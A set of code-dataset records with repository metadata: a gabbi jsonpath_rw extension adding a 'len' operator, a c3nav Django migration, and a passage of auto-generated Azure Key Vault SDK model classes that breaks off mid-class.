# License for the specific language governing permissions and limitations
# under the License.
"""Extend jsonpath_rw to add a len command."""
import jsonpath_rw
PARSER = None
class Len(jsonpath_rw.JSONPath):
"""The JSONPath referring to the len of the current object.
Concrete syntax is '`len`'.
"""
def find(self, datum):
datum = jsonpath_rw.DatumInContext.wrap(datum)
try:
value = len(datum.value)
except TypeError:
return []
else:
return [jsonpath_rw.DatumInContext(value,
context=None,
path=Len())]
def __eq__(self, other):
return isinstance(other, Len)
def __str__(self):
return '`len`'
def __repr__(self):
return 'Len()'
class GabbiJsonPathParser(jsonpath_rw.parser.JsonPathParser):
"""Custom gabbi LALR-parser for JsonPath"""
def p_jsonpath_named_operator(self, p):
"jsonpath : NAMED_OPERATOR"
if p[1] == 'len':
p[0] = Len()
else:
super(GabbiJsonPathParser, self).p_jsonpath_named_operator(p)
def parse(path):
global PARSER
if not PARSER:
PARSER = GabbiJsonPathParser()
return PARSER.parse(path)
| [
"tony.pig@gmail.com"
] | tony.pig@gmail.com |
0c32e339b8ce62f268067fe422d2a0647eb1a8f6 | 160f08e768d7271f9522ad2597ac4ee79c04477a | /src/c3nav/editor/migrations/0007_auto_20170629_1327.py | b6eef0ff11322c72847b632eda0ad004cbc53e55 | [
"Apache-2.0"
] | permissive | c3nav/c3nav | 6254724dfc8589ee03c6028577befd7c65b05857 | 1a4ef5caa06ddacc8d9370b5adcee248fd4f55f7 | refs/heads/main | 2023-08-04T08:36:18.431458 | 2023-07-24T09:57:18 | 2023-07-24T09:57:18 | 56,852,994 | 140 | 47 | Apache-2.0 | 2023-07-05T22:55:27 | 2016-04-22T12:13:51 | Python | UTF-8 | Python | false | false | 686 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 13:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('editor', '0006_auto_20170629_1222'),
]
operations = [
migrations.AddField(
model_name='changeset',
name='description',
field=models.TextField(default='', max_length=1000, verbose_name='Description'),
),
migrations.AddField(
model_name='changeset',
name='title',
field=models.CharField(default='', max_length=100, verbose_name='Title'),
),
]
| [
"laura@codingcatgirl.de"
] | laura@codingcatgirl.de |
7cda6545aa4e117911a9bf0c0c0162781f742660 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2021_10_01/models/_models_py3.py | d9a4c3cc5f7155b9a39e6f24901bc956464b01fa | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 152,343 | py | # coding=utf-8
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Any, Dict, List, Optional, TYPE_CHECKING, Union
from ... import _serialization
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from .. import models as _models
class AccessPolicyEntry(_serialization.Model):
"""An identity that have access to the key vault. All identities in the array must use the same
tenant ID as the key vault's tenant ID.
All required parameters must be populated in order to send to Azure.
:ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault. Required.
:vartype tenant_id: str
:ivar object_id: The object ID of a user, service principal or security group in the Azure
Active Directory tenant for the vault. The object ID must be unique for the list of access
policies. Required.
:vartype object_id: str
:ivar application_id: Application ID of the client making request on behalf of a principal.
:vartype application_id: str
:ivar permissions: Permissions the identity has for keys, secrets and certificates. Required.
:vartype permissions: ~azure.mgmt.keyvault.v2021_10_01.models.Permissions
"""
_validation = {
"tenant_id": {"required": True},
"object_id": {"required": True},
"permissions": {"required": True},
}
_attribute_map = {
"tenant_id": {"key": "tenantId", "type": "str"},
"object_id": {"key": "objectId", "type": "str"},
"application_id": {"key": "applicationId", "type": "str"},
"permissions": {"key": "permissions", "type": "Permissions"},
}
def __init__(
self,
*,
tenant_id: str,
object_id: str,
permissions: "_models.Permissions",
application_id: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault. Required.
:paramtype tenant_id: str
:keyword object_id: The object ID of a user, service principal or security group in the Azure
Active Directory tenant for the vault. The object ID must be unique for the list of access
policies. Required.
:paramtype object_id: str
:keyword application_id: Application ID of the client making request on behalf of a principal.
:paramtype application_id: str
:keyword permissions: Permissions the identity has for keys, secrets and certificates.
Required.
:paramtype permissions: ~azure.mgmt.keyvault.v2021_10_01.models.Permissions
"""
super().__init__(**kwargs)
self.tenant_id = tenant_id
self.object_id = object_id
self.application_id = application_id
self.permissions = permissions
class Attributes(_serialization.Model):
"""The object attributes managed by the KeyVault service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar enabled: Determines whether the object is enabled.
:vartype enabled: bool
:ivar not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:vartype not_before: ~datetime.datetime
:ivar expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:vartype expires: ~datetime.datetime
:ivar created: Creation time in seconds since 1970-01-01T00:00:00Z.
:vartype created: ~datetime.datetime
:ivar updated: Last updated time in seconds since 1970-01-01T00:00:00Z.
:vartype updated: ~datetime.datetime
"""
_validation = {
"created": {"readonly": True},
"updated": {"readonly": True},
}
_attribute_map = {
"enabled": {"key": "enabled", "type": "bool"},
"not_before": {"key": "nbf", "type": "unix-time"},
"expires": {"key": "exp", "type": "unix-time"},
"created": {"key": "created", "type": "unix-time"},
"updated": {"key": "updated", "type": "unix-time"},
}
def __init__(
self,
*,
enabled: Optional[bool] = None,
not_before: Optional[datetime.datetime] = None,
expires: Optional[datetime.datetime] = None,
**kwargs: Any
) -> None:
"""
:keyword enabled: Determines whether the object is enabled.
:paramtype enabled: bool
:keyword not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:paramtype not_before: ~datetime.datetime
:keyword expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:paramtype expires: ~datetime.datetime
"""
super().__init__(**kwargs)
self.enabled = enabled
self.not_before = not_before
self.expires = expires
self.created = None
self.updated = None
class CheckNameAvailabilityResult(_serialization.Model):
"""The CheckNameAvailability operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name_available: A boolean value that indicates whether the name is available for you to
use. If true, the name is available. If false, the name has already been taken or is invalid
and cannot be used.
:vartype name_available: bool
:ivar reason: The reason that a vault name could not be used. The Reason element is only
returned if NameAvailable is false. Known values are: "AccountNameInvalid" and "AlreadyExists".
:vartype reason: str or ~azure.mgmt.keyvault.v2021_10_01.models.Reason
:ivar message: An error message explaining the Reason value in more detail.
:vartype message: str
"""
_validation = {
"name_available": {"readonly": True},
"reason": {"readonly": True},
"message": {"readonly": True},
}
_attribute_map = {
"name_available": {"key": "nameAvailable", "type": "bool"},
"reason": {"key": "reason", "type": "str"},
"message": {"key": "message", "type": "str"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.name_available = None
self.reason = None
self.message = None
class CloudErrorBody(_serialization.Model):
"""An error response from Key Vault resource provider.
:ivar code: Error code. This is a mnemonic that can be consumed programmatically.
:vartype code: str
:ivar message: User friendly error message. The message is typically localized and may vary
with service version.
:vartype message: str
"""
_attribute_map = {
"code": {"key": "code", "type": "str"},
"message": {"key": "message", "type": "str"},
}
def __init__(self, *, code: Optional[str] = None, message: Optional[str] = None, **kwargs: Any) -> None:
"""
:keyword code: Error code. This is a mnemonic that can be consumed programmatically.
:paramtype code: str
:keyword message: User friendly error message. The message is typically localized and may vary
with service version.
:paramtype message: str
"""
super().__init__(**kwargs)
self.code = code
self.message = message
class DeletedManagedHsm(_serialization.Model):
"""DeletedManagedHsm.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The Azure Resource Manager resource ID for the deleted managed HSM Pool.
:vartype id: str
:ivar name: The name of the managed HSM Pool.
:vartype name: str
:ivar type: The resource type of the managed HSM Pool.
:vartype type: str
:ivar properties: Properties of the deleted managed HSM.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsmProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"properties": {"key": "properties", "type": "DeletedManagedHsmProperties"},
}
def __init__(self, *, properties: Optional["_models.DeletedManagedHsmProperties"] = None, **kwargs: Any) -> None:
"""
:keyword properties: Properties of the deleted managed HSM.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsmProperties
"""
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.properties = properties
class DeletedManagedHsmListResult(_serialization.Model):
"""List of deleted managed HSM Pools.
:ivar value: The list of deleted managed HSM Pools.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsm]
:ivar next_link: The URL to get the next set of deleted managed HSM Pools.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[DeletedManagedHsm]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self,
*,
value: Optional[List["_models.DeletedManagedHsm"]] = None,
next_link: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword value: The list of deleted managed HSM Pools.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsm]
:keyword next_link: The URL to get the next set of deleted managed HSM Pools.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class DeletedManagedHsmProperties(_serialization.Model):
"""Properties of the deleted managed HSM.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar mhsm_id: The resource id of the original managed HSM.
:vartype mhsm_id: str
:ivar location: The location of the original managed HSM.
:vartype location: str
:ivar deletion_date: The deleted date.
:vartype deletion_date: ~datetime.datetime
:ivar scheduled_purge_date: The scheduled purged date.
:vartype scheduled_purge_date: ~datetime.datetime
:ivar purge_protection_enabled: Purge protection status of the original managed HSM.
:vartype purge_protection_enabled: bool
:ivar tags: Tags of the original managed HSM.
:vartype tags: dict[str, str]
"""
_validation = {
"mhsm_id": {"readonly": True},
"location": {"readonly": True},
"deletion_date": {"readonly": True},
"scheduled_purge_date": {"readonly": True},
"purge_protection_enabled": {"readonly": True},
"tags": {"readonly": True},
}
_attribute_map = {
"mhsm_id": {"key": "mhsmId", "type": "str"},
"location": {"key": "location", "type": "str"},
"deletion_date": {"key": "deletionDate", "type": "iso-8601"},
"scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
"purge_protection_enabled": {"key": "purgeProtectionEnabled", "type": "bool"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.mhsm_id = None
self.location = None
self.deletion_date = None
self.scheduled_purge_date = None
self.purge_protection_enabled = None
self.tags = None
class DeletedVault(_serialization.Model):
"""Deleted vault information with extended details.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The resource ID for the deleted key vault.
:vartype id: str
:ivar name: The name of the key vault.
:vartype name: str
:ivar type: The resource type of the key vault.
:vartype type: str
:ivar properties: Properties of the vault.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedVaultProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"properties": {"key": "properties", "type": "DeletedVaultProperties"},
}
def __init__(self, *, properties: Optional["_models.DeletedVaultProperties"] = None, **kwargs: Any) -> None:
"""
:keyword properties: Properties of the vault.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedVaultProperties
"""
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.properties = properties
class DeletedVaultListResult(_serialization.Model):
"""List of vaults.
:ivar value: The list of deleted vaults.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedVault]
:ivar next_link: The URL to get the next set of deleted vaults.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[DeletedVault]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.DeletedVault"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The list of deleted vaults.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedVault]
:keyword next_link: The URL to get the next set of deleted vaults.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class DeletedVaultProperties(_serialization.Model):
"""Properties of the deleted vault.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar vault_id: The resource id of the original vault.
:vartype vault_id: str
:ivar location: The location of the original vault.
:vartype location: str
:ivar deletion_date: The deleted date.
:vartype deletion_date: ~datetime.datetime
:ivar scheduled_purge_date: The scheduled purged date.
:vartype scheduled_purge_date: ~datetime.datetime
:ivar tags: Tags of the original vault.
:vartype tags: dict[str, str]
:ivar purge_protection_enabled: Purge protection status of the original vault.
:vartype purge_protection_enabled: bool
"""
_validation = {
"vault_id": {"readonly": True},
"location": {"readonly": True},
"deletion_date": {"readonly": True},
"scheduled_purge_date": {"readonly": True},
"tags": {"readonly": True},
"purge_protection_enabled": {"readonly": True},
}
_attribute_map = {
"vault_id": {"key": "vaultId", "type": "str"},
"location": {"key": "location", "type": "str"},
"deletion_date": {"key": "deletionDate", "type": "iso-8601"},
"scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
"tags": {"key": "tags", "type": "{str}"},
"purge_protection_enabled": {"key": "purgeProtectionEnabled", "type": "bool"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.vault_id = None
self.location = None
self.deletion_date = None
self.scheduled_purge_date = None
self.tags = None
self.purge_protection_enabled = None
class DimensionProperties(_serialization.Model):
"""Type of operation: get, read, delete, etc.
:ivar name: Name of dimension.
:vartype name: str
:ivar display_name: Display name of dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Property to specify whether the dimension should be exported
for Shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_attribute_map = {
"name": {"key": "name", "type": "str"},
"display_name": {"key": "displayName", "type": "str"},
"to_be_exported_for_shoebox": {"key": "toBeExportedForShoebox", "type": "bool"},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
to_be_exported_for_shoebox: Optional[bool] = None,
**kwargs: Any
) -> None:
"""
:keyword name: Name of dimension.
:paramtype name: str
:keyword display_name: Display name of dimension.
:paramtype display_name: str
:keyword to_be_exported_for_shoebox: Property to specify whether the dimension should be
exported for Shoebox.
:paramtype to_be_exported_for_shoebox: bool
"""
super().__init__(**kwargs)
self.name = name
self.display_name = display_name
self.to_be_exported_for_shoebox = to_be_exported_for_shoebox
class Error(_serialization.Model):
"""The server error.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar inner_error: The inner error, contains a more specific error code.
:vartype inner_error: ~azure.mgmt.keyvault.v2021_10_01.models.Error
"""
_validation = {
"code": {"readonly": True},
"message": {"readonly": True},
"inner_error": {"readonly": True},
}
_attribute_map = {
"code": {"key": "code", "type": "str"},
"message": {"key": "message", "type": "str"},
"inner_error": {"key": "innererror", "type": "Error"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.code = None
self.message = None
self.inner_error = None
class IPRule(_serialization.Model):
"""A rule governing the accessibility of a vault from a specific ip address or ip range.
All required parameters must be populated in order to send to Azure.
:ivar value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address)
or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
:vartype value: str
"""
_validation = {
"value": {"required": True},
}
_attribute_map = {
"value": {"key": "value", "type": "str"},
}
def __init__(self, *, value: str, **kwargs: Any) -> None:
"""
:keyword value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP
address) or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
:paramtype value: str
"""
super().__init__(**kwargs)
self.value = value
class Resource(_serialization.Model):
"""Key Vault resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"tags": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.location = None
self.tags = None
class Key(Resource): # pylint: disable=too-many-instance-attributes
"""The key resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
:ivar attributes: The attributes of the key.
:vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
:ivar kty: The type of the key. For valid values, see JsonWebKeyType. Known values are: "EC",
"EC-HSM", "RSA", and "RSA-HSM".
:vartype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
:ivar key_ops:
:vartype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
:ivar key_size: The key size in bits. For example: 2048, 3072, or 4096 for RSA.
:vartype key_size: int
:ivar curve_name: The elliptic curve name. For valid values, see JsonWebKeyCurveName. Known
values are: "P-256", "P-384", "P-521", and "P-256K".
:vartype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
:ivar key_uri: The URI to retrieve the current version of the key.
:vartype key_uri: str
:ivar key_uri_with_version: The URI to retrieve the specific version of the key.
:vartype key_uri_with_version: str
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"tags": {"readonly": True},
"key_uri": {"readonly": True},
"key_uri_with_version": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"attributes": {"key": "properties.attributes", "type": "KeyAttributes"},
"kty": {"key": "properties.kty", "type": "str"},
"key_ops": {"key": "properties.keyOps", "type": "[str]"},
"key_size": {"key": "properties.keySize", "type": "int"},
"curve_name": {"key": "properties.curveName", "type": "str"},
"key_uri": {"key": "properties.keyUri", "type": "str"},
"key_uri_with_version": {"key": "properties.keyUriWithVersion", "type": "str"},
}
def __init__(
self,
*,
attributes: Optional["_models.KeyAttributes"] = None,
kty: Optional[Union[str, "_models.JsonWebKeyType"]] = None,
key_ops: Optional[List[Union[str, "_models.JsonWebKeyOperation"]]] = None,
key_size: Optional[int] = None,
curve_name: Optional[Union[str, "_models.JsonWebKeyCurveName"]] = None,
**kwargs: Any
) -> None:
"""
:keyword attributes: The attributes of the key.
:paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
:keyword kty: The type of the key. For valid values, see JsonWebKeyType. Known values are:
"EC", "EC-HSM", "RSA", and "RSA-HSM".
:paramtype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
:keyword key_ops:
:paramtype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
:keyword key_size: The key size in bits. For example: 2048, 3072, or 4096 for RSA.
:paramtype key_size: int
:keyword curve_name: The elliptic curve name. For valid values, see JsonWebKeyCurveName. Known
values are: "P-256", "P-384", "P-521", and "P-256K".
:paramtype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
"""
super().__init__(**kwargs)
self.attributes = attributes
self.kty = kty
self.key_ops = key_ops
self.key_size = key_size
self.curve_name = curve_name
self.key_uri = None
self.key_uri_with_version = None
class KeyAttributes(_serialization.Model):
"""The object attributes managed by the Azure Key Vault service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar enabled: Determines whether or not the object is enabled.
:vartype enabled: bool
:ivar not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:vartype not_before: int
:ivar expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:vartype expires: int
:ivar created: Creation time in seconds since 1970-01-01T00:00:00Z.
:vartype created: int
:ivar updated: Last updated time in seconds since 1970-01-01T00:00:00Z.
:vartype updated: int
:ivar recovery_level: The deletion recovery level currently in effect for the object. If it
contains 'Purgeable', then the object can be permanently deleted by a privileged user;
otherwise, only the system can purge the object at the end of the retention interval. Known
values are: "Purgeable", "Recoverable+Purgeable", "Recoverable", and
"Recoverable+ProtectedSubscription".
:vartype recovery_level: str or ~azure.mgmt.keyvault.v2021_10_01.models.DeletionRecoveryLevel
:ivar exportable: Indicates if the private key can be exported.
:vartype exportable: bool
"""
_validation = {
"created": {"readonly": True},
"updated": {"readonly": True},
"recovery_level": {"readonly": True},
}
_attribute_map = {
"enabled": {"key": "enabled", "type": "bool"},
"not_before": {"key": "nbf", "type": "int"},
"expires": {"key": "exp", "type": "int"},
"created": {"key": "created", "type": "int"},
"updated": {"key": "updated", "type": "int"},
"recovery_level": {"key": "recoveryLevel", "type": "str"},
"exportable": {"key": "exportable", "type": "bool"},
}
def __init__(
self,
*,
enabled: Optional[bool] = None,
not_before: Optional[int] = None,
expires: Optional[int] = None,
exportable: Optional[bool] = None,
**kwargs: Any
) -> None:
"""
:keyword enabled: Determines whether or not the object is enabled.
:paramtype enabled: bool
:keyword not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:paramtype not_before: int
:keyword expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:paramtype expires: int
:keyword exportable: Indicates if the private key can be exported.
:paramtype exportable: bool
"""
super().__init__(**kwargs)
self.enabled = enabled
self.not_before = not_before
self.expires = expires
self.created = None
self.updated = None
self.recovery_level = None
self.exportable = exportable
class KeyCreateParameters(_serialization.Model):
"""The parameters used to create a key.
All required parameters must be populated in order to send to Azure.
:ivar tags: The tags that will be assigned to the key.
:vartype tags: dict[str, str]
:ivar properties: The properties of the key to be created. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.KeyProperties
"""
_validation = {
"properties": {"required": True},
}
_attribute_map = {
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "KeyProperties"},
}
def __init__(
self, *, properties: "_models.KeyProperties", tags: Optional[Dict[str, str]] = None, **kwargs: Any
) -> None:
"""
:keyword tags: The tags that will be assigned to the key.
:paramtype tags: dict[str, str]
:keyword properties: The properties of the key to be created. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.KeyProperties
"""
super().__init__(**kwargs)
self.tags = tags
self.properties = properties
class KeyListResult(_serialization.Model):
"""The page of keys.
:ivar value: The key resources.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Key]
:ivar next_link: The URL to get the next page of keys.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Key]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.Key"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The key resources.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Key]
:keyword next_link: The URL to get the next page of keys.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class KeyProperties(_serialization.Model):
"""The properties of the key.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar attributes: The attributes of the key.
:vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
:ivar kty: The type of the key. For valid values, see JsonWebKeyType. Known values are: "EC",
"EC-HSM", "RSA", and "RSA-HSM".
:vartype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
:ivar key_ops:
:vartype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
:ivar key_size: The key size in bits. For example: 2048, 3072, or 4096 for RSA.
:vartype key_size: int
:ivar curve_name: The elliptic curve name. For valid values, see JsonWebKeyCurveName. Known
values are: "P-256", "P-384", "P-521", and "P-256K".
:vartype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
:ivar key_uri: The URI to retrieve the current version of the key.
:vartype key_uri: str
:ivar key_uri_with_version: The URI to retrieve the specific version of the key.
:vartype key_uri_with_version: str
"""
_validation = {
"key_uri": {"readonly": True},
"key_uri_with_version": {"readonly": True},
}
_attribute_map = {
"attributes": {"key": "attributes", "type": "KeyAttributes"},
"kty": {"key": "kty", "type": "str"},
"key_ops": {"key": "keyOps", "type": "[str]"},
"key_size": {"key": "keySize", "type": "int"},
"curve_name": {"key": "curveName", "type": "str"},
"key_uri": {"key": "keyUri", "type": "str"},
"key_uri_with_version": {"key": "keyUriWithVersion", "type": "str"},
}
def __init__(
self,
*,
attributes: Optional["_models.KeyAttributes"] = None,
kty: Optional[Union[str, "_models.JsonWebKeyType"]] = None,
key_ops: Optional[List[Union[str, "_models.JsonWebKeyOperation"]]] = None,
key_size: Optional[int] = None,
curve_name: Optional[Union[str, "_models.JsonWebKeyCurveName"]] = None,
**kwargs: Any
) -> None:
"""
:keyword attributes: The attributes of the key.
:paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
:keyword kty: The type of the key. For valid values, see JsonWebKeyType. Known values are:
"EC", "EC-HSM", "RSA", and "RSA-HSM".
:paramtype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
:keyword key_ops:
:paramtype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
:keyword key_size: The key size in bits. For example: 2048, 3072, or 4096 for RSA.
:paramtype key_size: int
:keyword curve_name: The elliptic curve name. For valid values, see JsonWebKeyCurveName. Known
values are: "P-256", "P-384", "P-521", and "P-256K".
:paramtype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
"""
super().__init__(**kwargs)
self.attributes = attributes
self.kty = kty
self.key_ops = key_ops
self.key_size = key_size
self.curve_name = curve_name
self.key_uri = None
self.key_uri_with_version = None
class LogSpecification(_serialization.Model):
"""Log specification of operation.
:ivar name: Name of log specification.
:vartype name: str
:ivar display_name: Display name of log specification.
:vartype display_name: str
:ivar blob_duration: Blob duration of specification.
:vartype blob_duration: str
"""
_attribute_map = {
"name": {"key": "name", "type": "str"},
"display_name": {"key": "displayName", "type": "str"},
"blob_duration": {"key": "blobDuration", "type": "str"},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
blob_duration: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword name: Name of log specification.
:paramtype name: str
:keyword display_name: Display name of log specification.
:paramtype display_name: str
:keyword blob_duration: Blob duration of specification.
:paramtype blob_duration: str
"""
super().__init__(**kwargs)
self.name = name
self.display_name = display_name
self.blob_duration = blob_duration
class ManagedHsmResource(_serialization.Model):
"""Managed HSM resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The Azure Resource Manager resource ID for the managed HSM Pool.
:vartype id: str
:ivar name: The name of the managed HSM Pool.
:vartype name: str
:ivar type: The resource type of the managed HSM Pool.
:vartype type: str
:ivar location: The supported Azure location where the managed HSM Pool should be created.
:vartype location: str
:ivar sku: SKU details.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar system_data: Metadata pertaining to creation and last modification of the key vault
resource.
:vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"sku": {"key": "sku", "type": "ManagedHsmSku"},
"tags": {"key": "tags", "type": "{str}"},
"system_data": {"key": "systemData", "type": "SystemData"},
}
def __init__(
self,
*,
location: Optional[str] = None,
sku: Optional["_models.ManagedHsmSku"] = None,
tags: Optional[Dict[str, str]] = None,
**kwargs: Any
) -> None:
"""
:keyword location: The supported Azure location where the managed HSM Pool should be created.
:paramtype location: str
:keyword sku: SKU details.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
"""
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
